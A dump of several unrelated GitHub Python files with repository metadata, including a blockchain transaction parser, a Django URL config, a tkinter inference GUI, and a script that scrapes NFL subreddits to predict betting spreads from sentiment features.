fresh\r\n\tprint(' Re-writing database minus the last block height...')\r\n\tline = prev_output.readline()\r\n\twhile line:\r\n\t\tblockHeight = line.split(',')[1]\r\n\r\n\t\tif blockHeight == lastBlockHeight:\r\n\t\t\tbreak\r\n\r\n\t\toutput.write(line)\r\n\t\tline = prev_output.readline()\r\n\r\n\tcounter = lastBlockHeightInt - 1\r\n\r\n\tprev_output.close()\r\n\toutput.close()\r\n\tos.remove(tempFileName)\r\n\tsessionResumed = True\r\n\treturn lastBlockHeightInt\r\n\r\n\r\noutput = None\r\noutputAddressMap = None\r\nif os.path.exists(outputDatabaseFileName) and os.path.exists(outputMappingFileName):\r\n\tresume = input('Previous session found, resume it? (y/n): ').lower() in ['y', 'yes']\r\n\tif resume == False:\r\n\t\tconfirm = input('Are you sure you\\'d like to overwrite this session? (y/n): ').lower() in ['y', 'yes']\r\n\r\n\t\tif confirm == False:\r\n\t\t\tprint('Goodbye.')\r\n\t\t\tsys.exit()\r\n\r\n\t\toutput = open(outputDatabaseFileName, 'w+')\r\n\t\toutputAddressMap = open(outputMappingFileName, 'w+')\r\n\t\toutputAddressMap.write('Primary Key,Address,\\n')\r\n\r\n\telse:\r\n\t\tprint('Resuming session...')\r\n\t\ttry:\r\n\t\t\tstartHeight = resumeSession()\r\n\t\texcept Exception as e:\r\n\t\t\tprint('Failed to resume:', e)\r\n\t\t\tsys.exit()\r\n\t\toutput = open(outputDatabaseFileName, 'a+')\r\n\t\toutputAddressMap = open(outputMappingFileName, 'a+')\r\n\r\n\t\tprint('Successfully resumed session to block height', startHeight)\r\n\t\ttime.sleep(5)\r\n\t\tprint('Beginning in five seconds...')\r\n\t\ttime.sleep(5)\r\nelse:\r\n\toutput = open(outputDatabaseFileName, 'w+')\r\n\toutputAddressMap = open(outputMappingFileName, 'w+')\r\n\toutputAddressMap.write('Primary Key,Address,\\n')\r\n\r\n\r\n\r\ndef mapAddress(address):\r\n\tif address == '*': return '*'\r\n\tglobal addressMap, addressMapCount\r\n\tif address in addressMap:\r\n\t\treturn addressMap[address]\r\n\taddressMap[address] = addressMapCount\r\n\toutputAddressMap.write(f'{addressMap[address]},{address},\\n')\r\n\taddressMapCount += 1\r\n\treturn addressMap[address]\r\n\r\ndef dumpBlock(block):\r\n\tlines = ''\r\n\r\n\tfor tx in block.transactions:\r\n\r\n\t\ttxInputAddresses = ''\r\n\t\ttxOutputAddresses = ''\r\n\r\n\t\tinputValueSum = 0\r\n\t\toutputValueSum = 0\r\n\t\tyoungestAddressIndex = None\r\n\r\n\t\tif tx.is_coinbase():\r\n\t\t\ttxInputAddresses = 'COINBASE'\r\n\r\n\t\telse:\r\n\t\t\tfor _input in tx.inputs:\r\n\t\t\t\tinputHash = _input.transaction_hash\r\n\t\t\t\tinputIndex = _input.transaction_index\r\n\r\n\t\t\t\ttry:\r\n\t\t\t\t\toldtx = blockchain.get_transaction(inputHash, db)\r\n\t\t\t\t\toldtxoutput = oldtx.outputs[inputIndex]\r\n\t\t\t\t\taddresses = oldtxoutput.addresses\r\n\t\t\t\t\taddress = ''\r\n\t\t\t\t\tvalue = oldtxoutput.value\r\n\t\t\t\t\tif len(addresses) < 1:\r\n\t\t\t\t\t\taddress = '*'\r\n\t\t\t\t\t\tprint('INVALID TRANSACTION INPUT')\r\n\t\t\t\t\t\tprint(' TX ' + inputHash)\r\n\t\t\t\t\t\tprint(' TX Output[' + str(inputIndex) + ']')\r\n\t\t\t\t\telif len(addresses) > 1:\r\n\t\t\t\t\t\tprint('MULTIPLE TRANSACTION INPUTs')\r\n\t\t\t\t\t\tprint(' TX ' + inputHash)\r\n\t\t\t\t\t\tprint(' TX Input[' + str(inputIndex) + ']')\r\n\r\n\t\t\t\t\t\taddress = '['\r\n\t\t\t\t\t\tfor a in range(len(addresses)):\r\n\t\t\t\t\t\t\taddress += str(addresses[a].address)\r\n\t\t\t\t\t\t\tif a != len(addresses) - 1:\r\n\t\t\t\t\t\t\t\taddress += ','\r\n\t\t\t\t\t\taddress += ']'\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\taddress = str(addresses[0].address)\r\n\t\t\t\texcept:\r\n\t\t\t\t\taddress = '*'\r\n\t\t\t\t\tvalue = '*'\r\n\r\n\t\t\t\tif address == '*' and value == 0:\r\n\t\t\t\t\tcontinue # Skip OP_RETURN 0\r\n\r\n\t\t\t\taddressIndex = mapAddress(address)\r\n\t\t\t\tinputValueSum += value\r\n\t\t\t\tif addressIndex != '*' and (youngestAddressIndex == None or youngestAddressIndex < addressIndex):\r\n\t\t\t\t\tyoungestAddressIndex = addressIndex\r\n\t\t\t\ttxInputAddresses += str(addressIndex) + ':' + str(value) + ' '\r\n\r\n\t\t\ttxInputAddresses = txInputAddresses.strip()\r\n\t\t# print('Inputs: ', txInputAddresses)\r\n\r\n\t\toutputHash = tx.txid\r\n\t\toutputIndex = 0\r\n\t\tfor _output in tx.outputs:\r\n\t\t\taddresses = _output.addresses\r\n\t\t\taddress = ''\r\n\t\t\tvalue = _output.value\r\n\t\t\tif len(addresses) < 1:\r\n\t\t\t\tif value == 0: continue\r\n\t\t\t\taddress = '*'\r\n\t\t\telif len(addresses) > 1:\r\n\t\t\t\tprint('MULTIPLE TRANSACTION OUTPUTs')\r\n\t\t\t\tprint(' TX ' + outputHash)\r\n\t\t\t\tprint(' TX Output[' + str(outputIndex) + ']')\r\n\r\n\t\t\t\taddress = '['\r\n\t\t\t\tfor a in range(len(addresses)):\r\n\t\t\t\t\taddress += str(addresses[a].address)\r\n\t\t\t\t\tif a != len(addresses) - 1:\r\n\t\t\t\t\t\taddress += ','\r\n\t\t\t\taddress += ']'\r\n\t\t\telse:\r\n\t\t\t\taddress = str(addresses[0].address)\r\n\r\n\t\t\tif address == '*' and value == 0:\r\n\t\t\t\tcontinue # Skip OP_RETURN 0\r\n\r\n\t\t\taddressIndex = mapAddress(address)\r\n\t\t\toutputValueSum += value\r\n\t\t\tif addressIndex != '*' and (youngestAddressIndex == None or youngestAddressIndex < addressIndex):\r\n\t\t\t\tyoungestAddressIndex = addressIndex\r\n\t\t\ttxOutputAddresses += str(addressIndex) + ':' + str(value) + ' '\r\n\t\t\toutputIndex += 1\r\n\r\n\t\ttxOutputAddresses = txOutputAddresses.strip()\r\n\t\t#print('Outputs: ', txOutputAddresses)\r\n\r\n\r\n\t\tline = ''\r\n\t\tline += str((block.header.timestamp - epoch).total_seconds()) + ','\r\n\t\tline += str(block.height) + ','\r\n\t\tline += str(tx.txid) + ','\r\n\t\tline += txInputAddresses + ','\r\n\t\tline += txOutputAddresses + ','\r\n\t\tline += str(inputValueSum) + ','\r\n\t\tline += str(outputValueSum) + ','\r\n\t\tline += str(youngestAddressIndex) + ','\r\n\r\n\t\tlines += line + '\\n'\r\n\r\n\treturn lines\r\n\r\nif sessionResumed == False:\r\n\tline = 'Time Epoch,Block Height,TX ID,Inputs,Outputs,Sum Input Values,Sum Output Values,Youngest Address Index,'\r\n\toutput.write(line + '\\n')\r\n\r\nlastFlushTime = time.time() - 60\r\nfor block in blockchain.get_ordered_blocks(os.path.expanduser(os.path.join(bitcoinBlocksPath + 'index')), start=startHeight, end=endHeight, cache='index-cache.pickle'):\r\n\t#print(dir(block))\r\n\t#print(block.blk_file)\r\n\t#sys.exit()\r\n\r\n\tnow = time.time()\r\n\tif now - lastFlushTime >= 10: # Flush the files every 10 seconds\r\n\t\toutput.flush()\r\n\t\toutputAddressMap.flush()\r\n\t\tprint('Block ' + str(counter) + '\\t' + str(10 * counter / (endHeight - startHeight)) + '% Complete')\r\n\t\ttime.sleep(0.1)\r\n\t\tlastFlushTime = now\r\n\r\n\tlines = dumpBlock(block)\r\n\tif(lines):\r\n\t\toutput.write(lines)\r\n\r\n\tcounter += 1\r\n\t\t\r\ndb.close()\r\noutput.close()\r\nprint('Ok.')\r\n","repo_name":"simewu/litecoin_researcher","sub_path":"tools/Litecoin Parser/TX_Bitcoin_to_Database.py","file_name":"TX_Bitcoin_to_Database.py","file_ext":"py","file_size_in_byte":8698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"10241724382","text":"import pathlib\n\nfrom mapswipe_workers.definitions import DATA_PATH\n\n\ndef create_directories() -> None:\n \"\"\"Create directories\"\"\"\n dirs = (\n \"/api\",\n \"/api/website-data\",\n \"/api/agg_results\",\n \"/api/groups\",\n \"/api/history\",\n \"/api/hot_tm\",\n \"/api/project_geometries\",\n \"/api/projects\",\n \"/api/results\",\n \"/api/tasks\",\n \"/api/users\",\n \"/api/yes_maybe\",\n )\n\n for dir_name in dirs:\n path = pathlib.Path(DATA_PATH + dir_name)\n # mimicking the POSIX mkdir -p command\n path.mkdir(parents=True, exist_ok=True)\n","repo_name":"mapswipe/python-mapswipe-workers","sub_path":"mapswipe_workers/mapswipe_workers/utils/create_directories.py","file_name":"create_directories.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"5"} +{"seq_id":"44152647175","text":"from django.conf.urls import include, url\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\n\nadmin.autodiscover()\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'^', include('facturacion.urls',namespace=\"facturacion\")),\n]\n","repo_name":"joseamaya/tienda","sub_path":"tienda/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"71470839831","text":"import json\nimport alloimport\nimport time\nimport uuid\nfrom functools import cmp_to_key\nimport random\nimport utils\n\n\ndef sortkey(a, b, key, coef):\n a = a[key]\n b = b[key]\n if a != None and b != None:\n if isinstance(a, str):\n a = a.lower()\n b = b.lower()\n if a == b: return 0\n try:\n return -1 * coef if (a < b) else 1 * coef\n except:\n y=1\n if a:\n return 1 * coef\n elif b:\n return -1 * coef\n return 0\n\n\nclass ResultSet:\n\n def __init__(self, db, col=[], order=[], set=None, pagesize=-1, page=0):\n self.db=db\n self.id=utils.new_id()\n self.start_time=time.time()\n self.process_time=0\n self.order=order\n self.columns=col\n self.pagesize=pagesize\n self.page=page\n self.data= (set if set else [])\n if set!=None: self.close()\n\n def moustache(self, base={}):\n arr=[]\n for x in self.data:\n arr.append(x.json(self.columns))\n\n return utils.dictassign({\n \"count\" : len(self.data),\n \"time\" : int(self.process_time*1000)/1000,\n \"data\" : arr if self.pagesize<=0 else arr[self.page*self.pagesize:(self.page+1)*self.pagesize],\n \"page\" : self.page,\n \"nperpage\" : self.pagesize,\n \"id\" : self.id,\n \"npages\" : 1 if self.pagesize<=0 else (int(len(self.data)/self.pagesize)+ (1 if len(self.data)%self.pagesize>0 else 0)),\n \"payslist\": alloimport.ID_TO_PAYS\n }, base)\n\n def close(self):\n if self.order and len(self.order)>0:\n key, sens = self.order[0]\n self.data = sorted(self.data, key=cmp_to_key(lambda a, b: sortkey(a, b, key, 1 if sens else -1)))\n self.process_time = time.time() - self.start_time\n return self\n\n\n def sort(self, key, reverse):\n if key==\"shuffle\":\n random.shuffle(self.data)\n else:\n self.data = sorted(self.data, key=cmp_to_key(lambda a, b: sortkey(a, b, key, 1 if reverse else -1)))\n\n def put(self, row):\n if isinstance(row, (list, tuple)):\n self.data+=row\n else:\n self.data.append(row)\n\n def row_at(self, n):\n return self.data[n]\n\n def __len__(self): return len(self.data)\n\n def __repr__(self):\n return self.__str__()\n\n def __str__(self):\n head=self.db.header.allheader\n out=str(len(self.data))+\" résultats; en \"+str( int(self.process_time*1000000)/1000)+\" ms\\n\"\n out+=str(self.db.header.format(head))+\"\\n\"\n for x in self.data:\n out+=x.format(head)+\"\\n\"\n return out","repo_name":"FrancoisGautrais/AlloDB","sub_path":"resultset.py","file_name":"resultset.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"31157585166","text":"from __future__ import absolute_import, division\n\nimport tkinter as tk\nfrom tkinter import filedialog\nfrom os.path import exists, join, isdir\nfrom model.ThreeDimModel import ThreeDimModel\n\n\nclass InferenceFrame(tk.LabelFrame):\n def __init__(self, master=None):\n tk.LabelFrame.__init__(self, master)\n self.grid()\n self.model3D = ThreeDimModel()\n self.model_folder = tk.StringVar()\n self.data_folder = tk.StringVar()\n self.out_folder = tk.StringVar()\n\n self.generate_widgets()\n\n def generate_widgets(self):\n self.model_folder_button = tk.Button(\n self, text=\"Select a model\", command=self.model_folder_setter)\n self.data_folder_button = tk.Button(\n self, text=\"Select an input folder\", command=self.data_folder_setter)\n self.out_folder_button = tk.Button(\n self, text=\"Select an output folder\", command=self.output_folder_setter)\n self.model_folder_label = tk.Label(self, text=\"\", width=70, bg='red')\n self.data_folder_label = tk.Label(self, text=\"\", width=70, bg='red')\n self.out_folder_label = tk.Label(self, text=\"\", width=70, bg='red')\n self.big_button = tk.Button(\n self, text=\"Launch Inference\", command=self.launch_inference)\n self.model_folder_button.grid(row=0, column=0)\n self.out_folder_button.grid(row=2, column=0)\n self.data_folder_button.grid(row=1, column=0)\n self.model_folder_label.grid(row=0, column=1)\n self.data_folder_label.grid(row=1, column=1)\n self.out_folder_label.grid(row=2, column=1)\n self.big_button.grid(row=3, column=0, columnspan=2, sticky=tk.E + tk.W)\n\n def model_folder_setter(self):\n self.model_folder.set(filedialog.askdirectory(\n title=\"Select a model folder\"))\n self.model_folder_label.configure(text=self.model_folder.get())\n if exists(join(self.model_folder.get(), 'properties.json')):\n self.model_folder_label.configure(bg='green')\n self.model3D.load(self.model_folder.get())\n else:\n self.model_folder_label.configure(bg='red')\n\n def data_folder_setter(self):\n self.data_folder.set(filedialog.askdirectory(\n title='Select an input data folder'))\n self.data_folder_label.configure(text=self.data_folder.get())\n if isdir(join(self.data_folder.get(), 'RGB')):\n self.data_folder_label.configure(bg='green')\n else:\n self.data_folder_label.configure(bg='red')\n\n def output_folder_setter(self):\n self.out_folder.set(filedialog.askdirectory(\n title='Select an output directory'))\n self.out_folder_label.configure(text=self.out_folder.get())\n if self.out_folder.get():\n self.out_folder_label.configure(bg='green')\n else:\n self.out_folder_label.configure(bg='red')\n\n def launch_inference(self):\n if self.model_folder.get() and self.out_folder.get() and self.data_folder.get():\n self.model3D.compute(self.data_folder.get(), self.out_folder.get())\n","repo_name":"EtienneHouze/GUI_Learning","sub_path":"Python/gui/InferenceFrame.py","file_name":"InferenceFrame.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"16077133317","text":"import numpy as np\nimport pandas as pd\nimport praw\nimport psaw\nfrom tinydb import TinyDB, Query\nimport datetime\nimport time\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom nltk.tokenize import RegexpTokenizer\nfrom nltk.corpus import stopwords\nfrom nltk.stem.snowball import SnowballStemmer\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.naive_bayes import MultinomialNB, GaussianNB\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.svm import LinearSVC\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\nfrom sklearn.linear_model import LogisticRegression, LinearRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.decomposition import SparsePCA, PCA\nfrom sklearn.model_selection import KFold\nimport matplotlib.pyplot as plt\nfrom afinn import Afinn\nfrom keras.layers import Dense, LSTM, Dropout\nfrom keras.layers.convolutional import Conv2D\nfrom keras.wrappers.scikit_learn import KerasClassifier\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n\n\"\"\" CONFIGURATION \"\"\"\n\n# PRAW + PSAW configuration\nreddit = praw.Reddit(client_id=secrets.CLIENT_ID,\n client_secret=secrets.CLIENT_SECRET,\n user_agent=secrets.USERAGENT\n )\nprint(\"Read only:\", reddit.read_only)\nps = psaw.PushshiftAPI(reddit)\n\n# directory for data (from sportsline)\nDATA_PATH = \"XXXX\"\ndf = pd.read_csv(DATA_PATH)\n\n# return top 100 submissions from given time window and subreddit\ndef sub_query(team, d1, d2):\n start_epoch = time.mktime(d1.timetuple())\n end_epoch = time.mktime(d2.timetuple())\n submissions = list(ps.search_submissions(after=int(start_epoch),\n before=int(end_epoch),\n sort='desc',\n sort_type='score',\n subreddit=str(team),\n limit=100))\n if len(submissions) < 1:\n print(\"NO SUBMISSIONS COLLECTED\", team)\n sub_dict = []\n for sub in submissions:\n thisdict = {\n \"id\": sub.id,\n \"title\": sub.title,\n \"score\": sub.score\n }\n sub_dict.append(thisdict)\n return sub_dict\n\n# queries top 100 comments from given time window and subreddit\ndef com_query(team, d1, d2):\n start_epoch = time.mktime(d1.timetuple())\n end_epoch = time.mktime(d2.timetuple()) \n comments = list(ps.search_comments(after=int(start_epoch),\n before=int(end_epoch),\n sort='desc',\n sort_type='score',\n subreddit=str(team),\n limit=100))\n if len(comments) < 1:\n print(\"NO COMMENTS COLLECTED\", team)\n comment_dict= []\n for com in comments:\n thisdict = {\n \"id\": com.id,\n \"body\":com.body,\n \"score\":com.score\n }\n comment_dict.append(thisdict)\n return comment_dict\n\n\n# dictionaries for NFL team names\nteam_dict1 = {\n \"San Francisco 49ers\": \"49ers\",\n \"Arizona Cardinals\": \"AZCardinals\",\n \"Cincinnati Bengals\": \"bengals\",\n \"Cleveland Browns\": \"Browns\",\n \"Tampa Bay Buccaneers\": \"buccaneers\",\n \"Buffalo Bills\": \"buffalobills\",\n \"Los Angeles Chargers\": \"Chargers\",\n \"San Diego Chargers\": \"Chargers\",\n \"Chicago Bears\": \"CHIBears\",\n \"Indianapolis Colts\": \"Colts\",\n \"Dallas Cowboys\": \"cowboys\",\n \"Denver Broncos\": \"DenverBroncos\",\n \"Detroit Lions\": \"detroitlions\",\n \"Philadelphia Eagles\": \"eagles\",\n \"Atlanta Falcons\": \"falcons\",\n \"Green Bay Packers\": \"GreenBayPackers\",\n \"Jacksonville Jaguars\": \"Jaguars\",\n \"Kansas City Chiefs\": \"KansasCityChiefs\",\n \"Los Angeles Rams\": \"losangelesrams\",\n \"Miami Dolphins\": \"miamidolphins\",\n \"Minnesota Vikings\": \"minnesotavikings\",\n \"New York Giants\": \"NYGiants\",\n \"New York Jets\": \"nyjets\",\n \"Oakland Raiders\": \"oaklandraiders\",\n \"Carolina Panthers\": \"panthers\",\n \"New England Patriots\": \"Patriots\",\n \"Baltimore Ravens\": \"ravens\",\n \"Washington Redskins\": \"Redskins\",\n \"New Orleans Saints\": \"Saints\",\n \"Seattle Seahawks\": \"Seahawks\",\n \"Pittsburgh Steelers\": \"steelers\",\n \"St. Louis Rams\": \"StLouisRams\",\n \"Tennessee Titans\": \"Tennesseetitans\",\n \"Houston Texans\": \"Texans\"\n\t}\nteam_dict2 = {\n \"SF\": \"49ers\",\n \"ARI\": \"AZCardinals\",\n \"CIN\": \"bengals\",\n \"CLE\": \"Browns\",\n \"TB\": \"buccaneers\",\n \"BUF\": \"buffalobills\",\n \"LAC\": \"Chargers\",\n \"CHI\": \"CHIBears\",\n \"IND\": \"Colts\",\n \"DAL\": \"cowboys\",\n \"DEN\": \"DenverBroncos\",\n \"DET\": \"detroitlions\",\n \"PHI\": \"eagles\",\n \"ATL\": \"falcons\",\n \"GB\": \"GreenBayPackers\",\n \"JAX\": \"Jaguars\",\n \"KC\": \"KansasCityChiefs\",\n \"LAR\": \"losangelesrams\",\n \"MIA\": \"miamidolphins\",\n \"MIN\": \"minnesotavikings\",\n \"NYG\": \"NYGiants\",\n \"NYJ\": \"nyjets\",\n \"OAK\": \"oaklandraiders\",\n \"CAR\": \"panthers\",\n \"NE\": \"Patriots\",\n \"BAL\": \"ravens\",\n \"WAS\": \"Redskins\",\n \"NO\": \"Saints\",\n \"SEA\": \"Seahawks\",\n \"PIT\": \"steelers\",\n \"RAM\": \"StLouisRams\",\n \"TEN\": \"Tennesseetitans\",\n \"HOU\": \"Texans\"\n }\n\n\n\"\"\" DATA COLLECTION \"\"\"\n\nDELTA = 7 # time window\n\n# scrape relevant text for each game from Reddit\ndf['schedule_date'] = pd.to_datetime(df['schedule_date'])\ndf['home_submissions'] = \"\"\ndf['away_submissions'] = \"\"\ndf['home_comments'] = \"\"\ndf['away_comments'] = \"\"\ndf['home_wts'] = \"\"\nfor i, row in df.iterrows():\n date = df['schedule_date'][i] \n home = team_dict1[df['team_home'][i]]\n away = team_dict1[df['team_away'][i]]\n year = date.year\n \n # rams city change\n if year < 2016 and df['team_favorite_id'][i] == \"LAR\":\n df['team_favorite_id'][i] = \"RAM\"\n \n print(\"Processing row \", i, \":\", home, \" @ \", away, date)\n df['home_submissions'][i] = sub_query(home, date - datetime.timedelta(days=DELTA), date)\n df['home_comments'][i] = com_query(home, date - datetime.timedelta(days=DELTA), date)\n df['away_submissions'][i] = sub_query(away, date - datetime.timedelta(days=DELTA), date)\n df['away_comments'][i] = com_query(away, date - datetime.timedelta(days=DELTA), date)\n\n# saves scraped data\ndf.to_pickle('data7')\ndf = pd.read_pickle('data7')\n\n# instance\nscaler = StandardScaler()\ntokenizer = RegexpTokenizer(r'\\w+')\nlemmatizer = WordNetLemmatizer()\nstop_words = set(stopwords.words('english'))\nstemmer = SnowballStemmer(\"english\")\nvectorizer = CountVectorizer()\nanalyzer = SentimentIntensityAnalyzer()\ntransformer = TfidfTransformer(smooth_idf=False)\nafinn_analyzer = Afinn()\n\n# preprocess text\ndef preprocess(text):\n tokens = tokenizer.tokenize(text.lower()) #split into tokens\n tokens = [token for token in tokens if not token.isdigit()] # remove numbers\n tokens = [token for token in tokens if len(token) > 3] # remove single characters\n tokens = [token for token in tokens if not token in stop_words] # remove stop words\n # tokens = [stemmer.stem(tokens) for token in tokens] # \"stem\" words\n string = \"\"\n for token in tokens:\n string = \" \".join([string, token])\n return string\n\n\"\"\" FEATURE ENGINEERING \"\"\"\n\nhome_corpus = []\naway_corpus = []\nhome_vader = []\naway_vader = []\nhome_afinn = []\naway_afinn = []\ntemp = []\ndf['home_wts'] = '' # 1 for home team wins the spread, 0 for away\ndf['above_ou'] = '' # 1 for above, 0 for under\n\n# extract features from scraped text\nfor i in range(df.shape[0]):\n # remove empty rows\n if len(df['home_comments'][i]) == 0 or len(df['away_comments'][i])==0:\n df = df.drop([i], axis=0)\n continue\n \n home = team_dict1[df['team_home'][i]]\n away = team_dict1[df['team_away'][i]]\n\n # determine WTS outcome\n spread = df['spread_favorite'][i]\n if df['team_favorite_id'][i] != 'PICK':\n favored = team_dict2[df['team_favorite_id'][i]]\n # calculate point spread\n if away == favored:\n spread = -1*spread # away team is favored\n game_spread = df['score_home'][i]-df['score_away'][i]\n if game_spread + spread > 0:\n df['home_wts'][i] = 1 #\n elif game_spread + spread == 0:\n df = df.drop([i], axis=0) # REMOVE PUSH\n continue\n else:\n df['home_wts'][i] = 0\n\n # determine over-under outcome\n ou = df['over_under_line'][i]\n game_ou = df['score_home'][i]+df['score_away'][i]\n if ou > game_ou:\n df['above_ou'][i] = 1\n elif game_ou == ou:\n df = df.drop([i], axis=0) # REMOVE PUSH\n continue\n else:\n df['above_ou'][i] = 0 \n \n print(i)\n\n # home team\n string = \"\"\n for thisdict in df['home_comments'][i]:\n if thisdict[\"body\"] is None:\n continue\n string = string + thisdict[\"body\"] + \" \"\n string = preprocess(string)\n home_corpus.append(string)\n if len(string) == 0:\n home_vader.append([0,0,0,0])\n else:\n score = analyzer.polarity_scores(string)\n num_words = len(string.split())\n home_vader.append([score['pos'], score['neu'], score['neg'], score['compound']])\n home_afinn.append(afinn_analyzer.score(string))\n\n # away team\n string = \"\"\n for thisdict in df['away_comments'][i]:\n if thisdict[\"body\"] is None:\n continue\n string = string + thisdict[\"body\"] + \" \"\n string = preprocess(string)\n away_corpus.append(string)\n if len(string) == 0:\n away_vader.append([0,0,0,0])\n else:\n score = analyzer.polarity_scores(string)\n num_words = len(string.split())\n away_vader.append([score['pos'], score['neu'], score['neg'], score['compound']])\n away_afinn.append(afinn_analyzer.score(string))\n\n# create bag-of-words + TF-IDF transformations\nhome_counts = vectorizer.fit_transform(home_corpus).toarray()\nhome_tfidf = transformer.fit_transform(home_counts).toarray()\naway_counts = vectorizer.fit_transform(away_corpus).toarray()\naway_tfidf = transformer.fit_transform(away_counts).toarray()\n\n# create feature matrices\ncounts = []\ntfidf = []\nvader = []\nafinn = []\nfor i in range(home_counts.shape[0]):\n counts.append(np.concatenate((home_counts[i], away_counts[i])))\n tfidf.append(np.concatenate((home_tfidf[i], away_tfidf[i])))\n vader.append(np.concatenate((home_vader[i], away_vader[i])))\n afinn.append([home_afinn[i], away_afinn[i]])\ncounts = np.matrix(counts)\ntfidf = np.matrix(tfidf)\nvader = np.matrix(vader)\nafinn = np.matrix(afinn)\ny = np.array(df['home_wts']).astype(str).astype(int)\n#y = np.array(df['above_ou']).astype(str).astype(int)\n\n# perform k-fold validation (k=5) 100 times\ndef perform_kfold(model, X, y):\n train_score = []\n test_score = []\n for i in range(100):\n kf = KFold(n_splits=5)\n this_train_score = 0\n this_test_score = 0\n for train_index, test_index in kf.split(X):\n X_train, X_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n model.fit(X_train, y_train)\n this_train_score = this_train_score + accuracy_score(y_train, model.predict(X_train))\n this_test_score = this_test_score + accuracy_score(y_test, model.predict(X_test))\n #if sum(model.predict(X_test)) == len(model.predict(X_test)):\n # print(\"SINGLE CLASSIFICATION\")\n train_score.append(this_train_score/5)\n test_score.append(this_test_score/5)\n return np.mean(train_score), np.mean(test_score), np.var(train_score), np.var(test_score)\n\n\n# determine principal components to use (COUNTS)\npca = PCA().fit(counts)\n# plot cumulative sum of explained variance\nplt.figure()\nplt.plot(np.cumsum(pca.explained_variance_ratio_))\nplt.axhline(y=0.9, color='r', linestyle='-')\nplt.xlabel('Number of Components')\nplt.ylabel('Variance (%)') #for each component\nplt.title('Explained Variance for Counts Matrix ('+file_name+')')\nplt.show()\n\n# determine principal components to use (TFIDF)\npca = PCA().fit(tfidf)\n# plot cumulative sum of explained variance\nplt.figure()\nplt.plot(np.cumsum(pca.explained_variance_ratio_))\nplt.axhline(y=0.9, color='r', linestyle='-')\nplt.xlabel('Number of Components')\nplt.ylabel('Variance (%)') #for each component\nplt.title('Explained Variance for TFIDF Matrix ('+file_name+')')\nplt.show()\n\n\n\"\"\" TESTING MODELS \"\"\"\n\nfor X in [PCA(n_components=50).fit_transform(counts), PCA(n_components=1500).fit_transform(tfidf), vader, afinn]:\n print(X.shape)\n # Gaussian Naive Bayes\n model = GaussianNB()\n train_score, test_score, train_var, test_var = perform_kfold(model, X, y)\n #print(\"GNB (train): \", train_score)\n print(\"GNB: \", test_score,\"(\", test_var,\")\")\n\n # Random Forest\n for d in [2, 4]:\n model = RandomForestClassifier(n_estimators=100, max_depth=d)\n train_score, test_score, train_var, test_var = perform_kfold(model, X, y)\n #print(\"Random Forest (train): \", train_score)\n print(\"Random Forest: \", test_score,\"(\", test_var,\")\")\n\n # Linear SVC\n for C in [10**-3, 10**-2, 10**-1, 1, 10, 100]:\n model = LinearSVC(C=C)\n train_score, test_score, train_var, test_var = perform_kfold(model, X, y)\n #print(\"Linear SVC (train) C = \", C, \": \", train_score)\n print(\"Linear SVC C =\", C, \": \", test_score,\"(\", test_var,\")\")\n\n # Logistic Regression\n for C in [10**-3, 10**-2, 10**-1, 1, 10, 100]:\n model = LogisticRegression(C=C)\n train_score, test_score, train_var, test_var = perform_kfold(model, X, y)\n #print(\"Logistic (train) C = \", C, \": \", train_score)\n print(\"Logistic C =\", C, \": \", test_score,\"(\", test_var,\")\")\n\n # K-Nearest Neighbors\n for k in [1, 3, 5, 10]:\n model = KNeighborsClassifier(n_neighbors=k)\n train_score, test_score, train_var, test_var = perform_kfold(model, X, y)\n #print(\"Random Forest (train): \", train_score)\n print(\"K Nearest Neighbors K =\", k, \": \", test_score,\"(\", test_var,\")\")\n\n\n\"\"\" NEURAL NETWORKS \"\"\"\n\n# start a new dataframe\ndf = pd.read_csv(DATA_PATH)\ndf['schedule_date'] = pd.to_datetime(df['schedule_date'])\ndf['home_wts'] = \"\"\nfor delta in range(30):\n df['home_submissions_'+str(delta)] = \"\"\n df['away_submissions_'+str(delta)] = \"\"\n df['home_comments_'+str(delta)] = \"\"\n df['away_comments_'+str(delta)] = \"\"\n\n# scrape relevant text for each game from Reddit (30 day window)\nfor i, row in df.iterrows():\n date = df['schedule_date'][i]\n\n home = team_dict1[df['team_home'][i]]\n away = team_dict1[df['team_away'][i]]\n year = date.year\n \n # rams city change\n if year < 2016 and df['team_favorite_id'][i] == \"LAR\":\n df['team_favorite_id'][i] = \"RAM\"\n \n print(\"Processing row \", i, \":\", home, \" @ \", away, date)\n\n for delta in range(30):\n print(delta)\n df['home_submissions_'+str(delta)][i] = sub_query(home, date - datetime.timedelta(days=delta+1), date- datetime.timedelta(days=delta))\n df['home_comments_'+str(delta)][i] = com_query(home, date - datetime.timedelta(days=delta+1), date- datetime.timedelta(days=delta))\n df['away_submissions_'+str(delta)][i] = sub_query(away, date - datetime.timedelta(days=delta+1), date- datetime.timedelta(days=delta))\n df['away_comments_'+str(delta)][i] = com_query(away, date - datetime.timedelta(days=delta+1), date- datetime.timedelta(days=delta))\n\ndf.to_pickle('dataNN')\ndf = pd.read_pickle('dataNN')\n\n\"\"\" FEATURE ENGINEERING FOR NEURAL NETWORKS \"\"\"\n\ncorpus = []\nvader = []\nafinn = []\ndf['home_wts'] = '' # 1 for home team wins the spread, 0 for 